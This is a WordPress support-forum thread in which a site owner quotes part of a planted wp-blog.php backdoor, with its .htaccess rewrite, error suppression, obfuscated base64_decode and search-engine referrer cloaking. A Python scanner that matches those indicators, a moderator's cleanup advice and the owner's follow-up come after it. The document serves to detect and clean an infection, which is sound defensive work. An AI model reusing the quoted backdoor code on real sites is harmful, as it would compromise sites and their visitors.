• Resolved mgc

    (@mgc)


    I noticed a strange file in my managed wordpress folder called wp-blog.php. In it, there’s some interesting code. Here’s a snippet:

    @ini_set('display_errors', '0');
    error_reporting(0);
    $track = 'avt';
    if (isset($_REQUEST['check'])) {
    	$htaccess = '# BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^(.+).html$ wp-blog.php?key=$1
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress';
    if (file_put_contents('.htaccess', $htaccess)) {
    	touch('.htaccess', $actime);
    	touch('wp-blog.php', $actime);
    	echo 'ok';
    }
    exit;
    }
    
    if (is_dir("wp-includes/Text/Diff/p")) {
    	$dir = "wp-includes/Text/Diff/p";
    }
    else $dir = "wp-content/uploads/wp";
    
    $res = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'];
    
    $redirect = 0;
    $fof = '404 not found';
    
    function getRealIpAddr() {
        if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
          $ip=$_SERVER['HTTP_CLIENT_IP'];
        }
        elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
          $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
        }
        else {
          $ip=$_SERVER['REMOTE_ADDR'];
        }
        return $ip;
    }
    
    $ua = $_SERVER['HTTP_USER_AGENT'];
    $ip = getRealIpAddr();
    $ref = $_SERVER['HTTP_REFERER'];
    
    if (preg_match("/google|bing|yandex|mail|aport|yahoo|baidu|aol|ask|duckduck|seznam|shenma|naver|haosou|sogou|daum|coccoc|qwant|dogpile|excite|wolfram|rambler/i", $ref)) $redirect = 1;
    
    $ea = '_shaesx_';
    $ay = 'get_data_ya';
    $ae = 'decode';
    $ea = str_replace('_sha', 'bas', $ea);
    $ao = 'wp_ccd';
    $ee = $ea.$ae;
    $oa = str_replace('sx', '64', $ee);
    $genpass = "xxx+xxx";
    $tdpass = "xxxx";
    
    if (ini_get('allow_url_fopen')) {
        function get_data_ya($mmm) {
            $data = file_get_contents($mmm);
            return $data;
        }
    }

    There’s more, but this part looks like it’s doing something suspicious.

    I’m not a developer and only know a bit about coding, but is this malicious? How could it have been inserted? Also, can it in any way be tied to some 500-error related issues I’ve had recently? I appreciate your feedback. Thank you.
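As an added example (not code from the thread or from WordPress), here is a small Python scanner that checks a WordPress install for the indicators visible in the quoted snippet: a stray wp-blog.php in the web root, the .htaccess rule that rewrites every *.html request into it, the base64_decode name assembled with str_replace, the search-engine referrer check, and the wp-includes/Text/Diff/p directory. The sample texts at the bottom are constructed for the demo; the labels and file names are my own choice.

```python
import re
from pathlib import Path
from typing import Dict, List

# Content indicators lifted from the wp-blog.php snippet quoted in the post (label, regex).
CONTENT_INDICATORS = [
    ("rewrite of *.html into wp-blog.php", re.compile(r"RewriteRule\s+\^\(\.\+\)\.html\$\s+wp-blog\.php")),
    ("error output silenced", re.compile(r"@ini_set\('display_errors',\s*'0'\)")),
    ("base64_decode assembled via str_replace", re.compile(r"str_replace\('(_sha|sx)',\s*'(bas|64)'")),
    ("search-engine referrer cloaking", re.compile(r"preg_match\(\"/google\|bing\|yandex")),
    ("hidden payload dir under wp-includes/Text/Diff", re.compile(r"wp-includes/Text/Diff/p")),
]
# File names that do not belong in a stock WordPress web root (assumed list, extend as needed).
SUSPICIOUS_NAMES = {"wp-blog.php"}


def scan_text(path: str, text: str) -> List[str]:
    """Return the labels of every indicator matching this file's name or contents."""
    hits = []
    if Path(path).name in SUSPICIOUS_NAMES:
        hits.append("unexpected file name")
    for label, pattern in CONTENT_INDICATORS:
        if pattern.search(text):
            hits.append(label)
    return hits


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk an install, checking PHP files and .htaccess; returns {path: [labels]} for matches."""
    findings = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and (p.suffix == ".php" or p.name == ".htaccess"):
            hits = scan_text(p.as_posix(), p.read_text(errors="replace"))
            if hits:
                findings[p.as_posix()] = hits
    return findings


# Constructed samples (not real files): the rewrite block from the post, a clean stock one,
# and a cut-down copy of the obfuscation and cloaking lines.
INFECTED_HTACCESS = "RewriteEngine On\nRewriteRule ^(.+).html$ wp-blog.php?key=$1\nRewriteRule ^index\\.php$ - [L]\n"
CLEAN_HTACCESS = "RewriteEngine On\nRewriteRule ^index\\.php$ - [L]\nRewriteRule . /index.php [L]\n"
INFECTED_PHP = ("<?php\n@ini_set('display_errors', '0');\n$ea = str_replace('_sha', 'bas', '_shaesx_');\n"
                "$oa = str_replace('sx', '64', $ea . 'decode');\n$dir = \"wp-includes/Text/Diff/p\";\n"
                "if (preg_match(\"/google|bing|yandex/i\", $ref)) $redirect = 1;\n")

if __name__ == "__main__":
    for name, text in [(".htaccess", INFECTED_HTACCESS), (".htaccess", CLEAN_HTACCESS), ("wp-blog.php", INFECTED_PHP)]:
        print(name, "->", scan_text(name, text) or "clean")
```

Run `scan_tree("/path/to/wordpress")` against a copy of the site to list every file that matches; a hit on the rewrite rule alone is worth checking, since that rule sends all *.html requests to the dropped file.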

Viewing 2 replies - 1 through 2 (of 2 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Thread Starter mgc

    (@mgc)

    Hi Parrotlover and Steve,

    Thank you for confirming this. I’ve installed some reputable security plugins, run some external scans, and spent a few hours now combing through all the folders looking for anything that looks even remotely suspicious.

    I greatly appreciate your feedback and suggestions!

    Cheers,
    Michael

  • The topic ‘Strange file’ is closed to new replies.